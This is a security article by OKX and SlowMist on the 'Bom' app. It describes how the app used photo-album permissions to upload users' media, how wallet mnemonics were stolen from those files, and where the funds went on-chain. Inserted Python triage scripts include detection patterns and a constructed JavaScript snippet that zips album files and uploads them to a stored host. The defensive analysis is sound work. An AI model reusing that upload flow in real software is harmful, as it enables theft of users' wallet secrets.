OKX & SlowMist jointly released: Bom malware swept tens of thousands of users and stole assets exceeding $1.82 million

  • Malware Discovery: On February 14, 2025, OKX and SlowMist revealed the "Bom" malware, which stole over $1.82 million from 13,000+ users by disguising itself as a legitimate app and stealing wallet credentials.
  • Modus Operandi:
    • The malware tricked users into granting file/album permissions, then scanned devices for mnemonic phrases/private keys stored in media files.
    • Data was uploaded to malicious servers, enabling systematic asset theft.
  • Technical Analysis (OKX):
    • The app used suspicious permissions (e.g., file/album access) and had a non-standard signature ("adminwkhvjv").
    • Developed via UniApp framework, it encrypted key functions and hid upload domains in cached data.
  • On-Chain Tracking (SlowMist):
    • Primary hacker address (0x49aDd3E...) stole funds across BSC, Ethereum, Polygon, and other chains, swapping tokens via PancakeSwap/OKX-DEX.
    • A secondary address (0xcb6573E...) moved $650K to TRON, with partial funds traced to Huionepay-linked wallets.
  • Safety Recommendations:
    • Avoid downloading unverified apps, especially from unofficial sources.
    • Store mnemonics offline (e.g., paper/hardware wallets), avoid digital backups.
    • Use tools like MistTrack for fund monitoring and refer to SlowMist's self-rescue manual.
    • Regularly rotate wallets and enable screenshot blocks for sensitive data.
Summary

On February 14, 2025, many users reported that their wallet assets had been stolen. On-chain data analysis showed that every theft case matched the characteristics of a mnemonic/private key leak. Follow-up interviews with the victims found that most of them had installed and used an application called BOM. In-depth investigation showed that the application was in fact a carefully disguised fraudulent app: once the criminals had induced users to grant permissions through it, they illegally obtained the users' mnemonics/private keys and then carried out systematic asset transfers and concealment. The SlowMist AML team and the OKX Web3 security team therefore investigated and disclosed the modus operandi of the malware and performed on-chain tracking analysis, in the hope of providing more users with security warnings and advice.

1. Malware Analysis (OKX)

With the users' consent, the OKX Web3 security team collected the BOM application's APK files from some users' phones for analysis. The details are as follows:

1. Conclusion

  1. After the user enters the contract page, the malicious app deceives them into granting local file and photo album permissions on the pretext that these are required for the application to run.
  2. After obtaining the user's authorization, the app scans and collects media files from the device's photo album in the background, packages them and uploads them to its server. If the user's files or photo album contain mnemonics or private keys, the criminals can use the information collected by the app to steal the user's wallet assets.

2. Analysis process

1. Preliminary analysis of samples

1) Application signature analysis

The signature subject is not standardized. After parsing, it reads adminwkhvjv, a meaningless string of random characters. Legitimate applications generally use a meaningful combination of letters (typically the developer or company name).

2) Malicious permissions analysis

In the app's AndroidManifest file, we can see that a large number of permissions are registered, including several sensitive ones: reading and writing local files, reading media files, and accessing the photo album.
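As an added triage example (not code from the OKX or SlowMist teams), the following Python script applies the two checks above to constructed `aapt dump permissions` and `apksigner verify --print-certs` output: it lists the sensitive permissions a wallet app has no ordinary need for and flags a signer CN that looks like random characters. The permission list, the placeholder package name and the randomness heuristic are this example's own assumptions.

```python
import re

# Permissions a wallet-style app has no ordinary need for; the report's
# sample registered file, media and photo-album access of this kind.
SENSITIVE = {
    "android.permission.READ_EXTERNAL_STORAGE": "read local files / album",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write local files",
    "android.permission.READ_MEDIA_IMAGES": "read photos",
    "android.permission.READ_MEDIA_VIDEO": "read videos",
}

# Constructed sample of `aapt dump permissions` output (placeholder package name).
SAMPLE_AAPT = """package: com.example.placeholder
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_EXTERNAL_STORAGE'
uses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'
uses-permission: name='android.permission.READ_MEDIA_IMAGES'
"""
# Constructed sample of `apksigner verify --print-certs` output.
SAMPLE_APKSIGNER = "Signer #1 certificate DN: CN=adminwkhvjv\n"

def sensitive_permissions(aapt_output):
    """Return the sensitive uses-permission entries found in aapt output."""
    names = re.findall(r"uses-permission: name='([^']+)'", aapt_output)
    return {n: SENSITIVE[n] for n in names if n in SENSITIVE}

def signer_cn(apksigner_output):
    """Pull the CN out of the signer certificate DN line."""
    m = re.search(r"certificate DN: .*?CN=([^,\n]+)", apksigner_output)
    return m.group(1).strip() if m else None

def looks_random(subject):
    """Heuristic (assumption of this example): a subject with few vowels or a
    long consonant run, e.g. 'adminwkhvjv', is unlikely to be a real name."""
    letters = re.sub(r"[^a-z]", "", subject.lower())
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in "aeiou" for c in letters) / len(letters)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", letters)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 5

def triage(aapt_output, apksigner_output):
    """Findings an analyst would review before deeper static analysis."""
    findings = [f"sensitive permission {n} ({why})"
                for n, why in sensitive_permissions(aapt_output).items()]
    cn = signer_cn(apksigner_output)
    if cn and looks_random(cn):
        findings.append(f"signer CN '{cn}' looks like random characters")
    return findings

print("\n".join(triage(SAMPLE_AAPT, SAMPLE_APKSIGNER)))
```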

2. Dynamic Analysis

Since the app's backend API service was offline at the time of analysis, the app could not run normally and dynamic analysis could not be performed for the time being.

3. Decompilation analysis

After decompilation, we found that the application's dex contained very few classes, so we performed static analysis on these classes at the code level.

Its main logic is to decrypt some files and load the application:

The build output of uniapp is found in the assets directory, indicating that the app was developed with the cross-platform framework uniapp:

For an application developed with the uniapp framework, the main logic lives in the build output file app-service.js. Some key code is encrypted in app-confusion.js. We started our analysis from app-service.js.

1) Trigger entry

Among the registered page entries, I found the entry for the contract page.

The corresponding function index is 6596.

2) Initialization reporting of device information

The onLoad() callback, invoked after the contract page has loaded, calls doContract().

initUploadData() is called from doContract().

In initUploadData(), the network status is checked first, and the image and video lists are checked to see whether they are empty. Finally, the callback e() is invoked.

The callback e() is getAllAndIOS().

3) Check and request permissions

On iOS, permissions are requested first, and the user is deceived into agreeing by copy claiming that the application needs them to run normally. This authorization request is quite suspicious: a blockchain-related application has no necessary connection to photo album permissions for its normal operation, so the request clearly exceeds what the application needs.

On Android, the app likewise checks for and requests photo album permissions first.

4) Collect and read album files

The pictures and videos are then read and packaged in androidDoingUp.

5) Upload album files

Finally, the upload is performed in uploadBinFa(), uploadZipBinFa() and uploadDigui(). Note that the upload API path is also a random string of characters.

The iOS flow is similar. After obtaining the permission, the iOS build starts collecting the content to upload through getScreeshotAndShouchang().

6) Upload interface

The commonUrl domain name in the reporting URL comes from the response of the /api/bf9023/c99so interface.

The domain of this interface is read from uniapp's local cache (storage).

The code that writes this value to the cache was not found; it may be encrypted and obfuscated inside app-confusion.js. The domain was observed in the application cache left over from a previous run.
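The flow described in 2) to 6) can be turned into a static triage check for uniapp bundles. The Python below is an added example, not OKX's tooling: it splits a bundle into named functions, records which of them call permission, gallery, zip, upload and local-storage APIs, and flags letters-and-digits endpoint paths such as /api/bf9023/c99so. The sample bundle is constructed for the example (function names follow the report, bodies are illustrative), and the API names come from the public uni-app / HTML5+ documentation.

```python
import re

# API families a reviewer looks for in a uniapp / HTML5+ bundle such as
# app-service.js; grouping them into stages is this example's own assumption.
STAGES = {
    "permission": r"plus\.android\.requestPermissions|uni\.authorize",
    "media": r"plus\.gallery\.pick|uni\.chooseImage|uni\.chooseVideo",
    "archive": r"plus\.zip\.",
    "upload": r"uni\.uploadFile|plus\.uploader\.",
    "storage": r"uni\.getStorage(?:Sync)?\(",
}

# Constructed stand-in for a few functions of a bundle (illustrative only).
SAMPLE_BUNDLE = """
function initUploadData(e){uni.getNetworkType({success:function(){e()}})}
function getAllAndIOS(){plus.android.requestPermissions(["android.permission.READ_EXTERNAL_STORAGE"],androidDoingUp)}
function androidDoingUp(){plus.gallery.pick(function(r){plus.zip.compress(r.files,"_doc/up.zip",uploadZipBinFa)})}
function uploadZipBinFa(){var h=uni.getStorageSync("commonUrl");uni.uploadFile({url:h+"/api/bf9023/c99so",filePath:"_doc/up.zip"})}
"""

def split_functions(js):
    """Split a bundle into {name: source} at each named top-level function."""
    funcs = {}
    for chunk in re.split(r"(?=function\s+\w+\s*\()", js):
        m = re.match(r"function\s+(\w+)", chunk)
        if m:
            funcs[m.group(1)] = chunk
    return funcs

def stage_hits(js):
    """For each stage, the functions whose source calls one of its APIs."""
    funcs = split_functions(js)
    return {s: sorted(n for n, src in funcs.items() if re.search(p, src))
            for s, p in STAGES.items()}

def random_paths(js):
    """Quoted endpoint paths with a letters-and-digits segment, like the
    report's /api/bf9023/c99so; such paths deserve a closer look."""
    paths = re.findall(r"[\"'](/(?:[A-Za-z0-9]+/)*[A-Za-z0-9]+)[\"']", js)
    mixed = lambda seg: re.search(r"[A-Za-z]", seg) and re.search(r"\d", seg)
    return sorted({p for p in paths if any(mixed(s) for s in p.split("/"))})

def verdict(js):
    """Flag the permission -> media -> upload chain and an upload host read from storage."""
    hits = stage_hits(js)
    chain = all(hits[s] for s in ("permission", "media", "upload"))
    return {"album_exfil_chain": chain, "random_paths": random_paths(js),
            "url_from_storage": bool(hits["storage"] and hits["upload"]), "stages": hits}

print(verdict(SAMPLE_BUNDLE))
```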

2. On-chain Funding Analysis (SlowMist)

According to analysis with MistTrack, the on-chain tracking and anti-money-laundering tool from SlowMist AML, the current main theft address (0x49aDd3E8329f2A2f507238b0A684d03EAE205aab) has stolen funds from at least 13,000 users and profited more than 1.82 million US dollars.

(https://dune.com/queries/4721460)

The first transaction of the address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab occurred on February 12, 2025, when 0.001 BNB was transferred in from the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35 as initial capital:

Analyzing the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35, its first transaction also appeared on February 12, 2025. Its initial funds came from the address 0x71552085c854EeF431EE55Da5B024F9d845EC976, which MistTrack labels "Theft-Stolen Private Key":

Continuing with the fund flow of the initial hacker address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab:

BSC: Profit of about $37,000, including USDC, USDT, WBTC and other tokens; PancakeSwap was frequently used to swap some of the tokens for BNB:

The current address balance is 611 BNB and tokens worth approximately $120,000, such as USDT, DOGE, and FIL.

Ethereum: Profit of about $280,000, most of it ETH transferred in from other chains. 100 ETH was then transferred to 0x7438666a4f60c4eedc471fa679a43d8660b856e0. That address also received 160 ETH from the address 0x71552085c854EeF431EE55Da5B024F9d845EC976 mentioned above. The total of 260 ETH has not yet been moved out.

Polygon: Profit of about 37,000 or 65,000 US dollars, including WBTC, SAND, STG and other tokens. Most of the tokens were swapped for 66,986 POL through OKX-DEX. The current balance of the hacker address is as follows:

Arbitrum: Profit of about $37,000, including USDC, USDT, WBTC and other tokens; the tokens were converted to ETH, and a total of 14 ETH was bridged to Ethereum through OKX-DEX:

Base: Profit of about $12,000, including FLOCK, USDT, MOLLY and other tokens; the tokens were converted to ETH, and a total of 4.5 ETH was bridged to Ethereum through OKX-DEX:

The remaining chains are not described in detail. We also briefly analyzed another hacker address provided by a victim.

The first transaction of the hacker address 0xcb6573E878d1510212e84a85D4f93Fd5494f6EA0 appeared on February 13, 2025. It profited about 650,000 US dollars across multiple chains, and the relevant USDT was bridged to the TRON address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx:

The address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx received a total of 703,119.2422 USDT and currently holds 288,169.2422 USDT. Of the outflows, 83,000 USDT was transferred to the address TZJiMbiqBBxDXhZXbrtyTYZjVDA2jd4eus, where it has not been moved further, and the remaining 331,950 USDT was transferred to the address THKqT6PybrzcxkpFBGSPyE11kemRNRmDDz, which had previously interacted with Huionepay.

We will continue to monitor the relevant balance addresses.

3. Safety Recommendations

To help users improve their protection awareness, the SlowMist AML team and the OKX Web3 security team have compiled the following security recommendations:

  1. Never download software from unknown sources (including so-called "wool-pulling" (airdrop-farming) tools and any software from unknown publishers).
  2. Never trust software download links recommended by friends or in communities; always download through official channels.
  3. Download and install apps from regular channels, including Google Play, the App Store, and major official app stores.
  4. Keep mnemonics safe and do not store them as screenshots, photos, notepad entries, or cloud-drive files. The OKX mobile wallet already prohibits screenshots of the private key and mnemonic pages.
  5. Use physical methods to store mnemonics, such as writing them on paper, keeping them in a hardware wallet, or segmented storage (splitting the mnemonics/private keys and storing the parts in different locations).
  6. Rotating your wallet regularly can help eliminate potential security risks.
  7. With the help of professional on-chain tracking tools such as MistTrack (https://misttrack.io/), funds can be monitored and analyzed to reduce the risk of fraud or phishing incidents and better protect asset security.
  8. It is highly recommended to read the "Blockchain Dark Forest Self-Rescue Manual" written by Yu Xian, the founder of SlowMist.
Author: OKX

This article represents the views of a PANews columnist and does not represent PANews' position or carry its legal liability.

The article and its opinions do not constitute investment advice.

Image source: OKX. Please contact the author for removal if there is infringement.
